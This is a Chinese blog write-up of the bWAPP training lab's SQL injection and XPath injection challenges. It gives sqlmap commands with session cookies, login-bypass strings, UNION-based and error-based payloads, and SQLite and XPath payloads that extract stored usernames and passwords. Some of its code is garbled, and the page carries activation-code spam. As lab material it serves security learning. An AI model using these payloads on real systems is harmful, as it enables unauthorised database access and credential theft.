bwapp sql部分[通俗易懂]

bwapp sql部分[通俗易懂]文章目录SQLInjection(GET/Search)SQLInjection(GET/Select)SQLInjection(POST/Search)SQLInjection(POST/Select)SQLInjection(AJAX/JSON/jQuery)SQLInjection(CAPTCHA)SQLInjection(LoginForm/Hero)SQLInjection(LoginForm/User)SQLInjection(SQLite)SQLInj

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

SQL Injection (GET/Search)

这里的题都可以用sqlmap解决
sqlmap详解,可以参考这篇文章

构造sqlmap -u "http://192.168.41.137/sqli_1.php?title=a&action=search" -p title --cookie "security_level=0; PHPSESSID=bsmemp4vk1015lbju2csqchr63"
这里需要加cooike值,靶场需要登录
然后就会自动构造
在这里插入图片描述

SQL Injection (GET/Select)

在这里插入图片描述
使用order by 尝试可知,能试到7,
使用联合查询试一下,可以,然后就开始查库,查表,查列

SQL Injection (POST/Search)

使用了post传参而已
解决方法和get一样

SQL Injection (POST/Select)

在这里插入图片描述
通过抓包可以知道,不仅是post传参,而且title改成了movie,
解决方法一样

SQL Injection (AJAX/JSON/jQuery)

首先解释一下AJAX,Ajax 即“Asynchronous Javascript And XML”(异步 JavaScript 和 XML),通过在后台与服务器进行少量数据交换,Ajax 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。比如我们使用百度的时候,有个功能叫“搜索预测”,当你输入第一个字的时候,下拉框里就会出现大量可能的关键词候选,这个用的就是ajax技术,而它的返回值一般是json/xml格式的,jQuery中提供实现ajax的方法(因为js很容易捕捉客户端的按键行为)

在这里插入图片描述
抓包推断输入的aget传参方法,但
URL为sqli_10-2.php?title=a但是实际浏览器看到的页面是,sqli_10-1.php,观察源代码发现
在这里插入图片描述
sqli_10-1.php将参数通过getJSON方法传给sqli_10-2.php,sqli_10-2.php立马执行查询,所以真正的注入点在sqli_10-2.php的title参数
当然,sqlmap能解决

SQL Injection (CAPTCHA)

进入后,直接输点东西,观看url,即可知道点在哪里

SQL Injection (Login Form/Hero)

在这里插入图片描述
用sql语句构造绕过,
admin
aa ' or 'a' = 'a
这是我采用的一种写法
在这里插入图片描述
用sqlmap的话,
这样构造
sqlmap -u "http://192.168.248.130/bWAPP/sqli_3.php" --data "login=111&password=111&form=submit" --cookie "security_level=0; PHPSESSID=5913f596beeaf73e40495ff8037750a9" -p login
用给定的payload进行post注入

SQL Injection (Login Form/User)

在这里插入图片描述
order by 先爆破
当为9的时候
在这里插入图片描述
当为10的时候,
在这里插入图片描述
因此我们就可以相信他是9
' UNION SELECT 1,2,3,4,5,6,7,8,9#在使用联合查询爆破回显位
但尝试后感觉不行,最后搜索到的大佬是这样写的
' UNION SELECT 1,2,'356a192b7913b04c54574d18c28d46e6395428ab',4,5,6,7,8,9#
原因http://www.mamicode.com/info-detail-2239051.html

SQL Injection (SQLite)

SQLite 简介

SQLite是一个软件库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL
数据库引擎。SQLite是一个增长最快的数据库引擎,这是在普及方面的增长,与它的尺寸大小无关。SQLite 源代码不受版权限制。

sqlmap可以解决

SQL Injection – Stored (Blog)

在这里插入图片描述
用sqlmap将post参数加上去

SQL Injection – Stored (SQLite)

meetsec’,’’);
meetsec’,sqlite_version());
meetsec’,(select name from sqlite_master where type=‘table’));
meetsec’,(select login||”:”||password from users)) – –
新的独立的注入方法

SQL Injection – Stored (User-Agent)

在这里插入图片描述
抓包,修改UA为单引号,出现报错
继续
1' ,(select version()))#
1' ,(select user()))#,这样都可以查询到
在这里插入图片描述

SQL Injection – Stored (XML)

构造post参数
<reset><login>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</login><secret>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</secret></reset>

在这里插入图片描述

XML/XPath Injection (Login Form)

XPath其实和sql查询挺像,区别在于sql查询是在数据库中查数据,Xpath是在xml中找信息,既然如此只要熟悉一下Xpath的语法,知道它的特点即可找到对应的注入思路

在 XPath 中,有七种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档节点(或称为根节点)。节点之间存在父、子、先辈、后代、同胞关系,以t3stt3st.xml为例
根节点<root1> 、元素节点<user><username><key><hctfadmin>、属性节点name='user1'
<root1><user><htcfadmin>的父节点,同时也是<user><hctfadmin><username><key>的先辈。和是同胞节点。

在这里插入图片描述
构造meetset' or '1'='1,成功

在这里插入图片描述

XML/XPath Injection (Search)

在这里插入图片描述
$xml = simplexml_load_file(“passwords/heroes.xml”);

// XPath search
// $result = x m l − > x p a t h ( ” / / h e r o [ g e n r e = ′ xml->xpath(“//hero[genre = ‘ xml>xpath(//hero[genre=genre’]/movie”);
$result = x m l − > x p a t h ( ” / / h e r o [ c o n t a i n s ( g e n r e , ′ xml->xpath(“//hero[contains(genre, ‘ xml>xpath(//hero[contains(genre,genre’)]/movie”);

那么我们补全我们需要但他所缺乏的
构造payload')]/password | a[contains(a,'
这样完整的语句就是
$result = $xml->xpath("//hero[contains(genre, '')]/password | a[contains(a,'')]/movie");

$result = $xml->xpath("//hero/password");

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/190423.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • k8s 微服务打包上传私库、部署、发布

    k8s 微服务打包上传私库、部署、发布微服务打包上传私库、部署、发布1.Ideamaven打包修改配置文件yml的eureka地址:http://10.0.0.111:11111/eurekaMaven打成jar包。2.

    2022年7月1日
    21
  • 完全合并C++面试题

    完全合并C++面试题

    2021年12月31日
    38
  • EasyDSS流媒体服务器软件(支持RTMP/HLS/HTTP-FLV/视频点播/视频直播)-正式环境安装部署攻略

    EasyDSS流媒体服务器软件(支持RTMP/HLS/HTTP-FLV/视频点播/视频直播)-正式环境安装部署攻略EasyDSS流媒体服务器软件,提供一站式的转码、点播、直播、时移回放服务,极大地简化了开发和集成的工作。其中,点播功能主要包含:上传、转码、分发。直播功能,主要包含:直播、录像,直播支持RTMP输入,RTMP/HLS/HTTP-FLV的分发输出;录像支持自定义保存时长、检索及下载。提供丰富的二次开发接口,基于JSON的封装及HTTP调用。提供播放鉴权、推流鉴权等安全保证。提供用户及相关权限管…

    2022年6月5日
    42
  • 常用信息收集方法[通俗易懂]

    常用信息收集方法[通俗易懂]信息收集的种类信息收集分为被动收集和主动收集两种方式。被动信息收集:利用第三方的服务对目标进行访问:Google搜索、Shodan搜索、其他综合工具,被动信息收集是指京可能多低收集与目标相关的信息主动信息收集:通过直接扫描目标主机或者网站,主动方式能获取更多的信息,目标系统可能会记录操作信息。在信息收集中,需要收集的信息:目标主机的DNS信息、目标IP地址、子域名、旁站和C段、CMS类型、敏感目录、端口信息、操作系统版本、网站架构、漏洞信息、服务器与中间件信息、邮箱、人员、地址等。在信息收集中

    2022年6月17日
    68
  • Buzzcast_buzz killer

    Buzzcast_buzz killerEpisode49ofTheSitePointPodcastisnowavailable!ThisweekyourhostsareStephanSegraves(@ssegraves),BradWilliams(@williamsba),andKevinYank(@sentience).SitePointPodcast的第49集现已发布!本周…

    2022年10月15日
    1

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号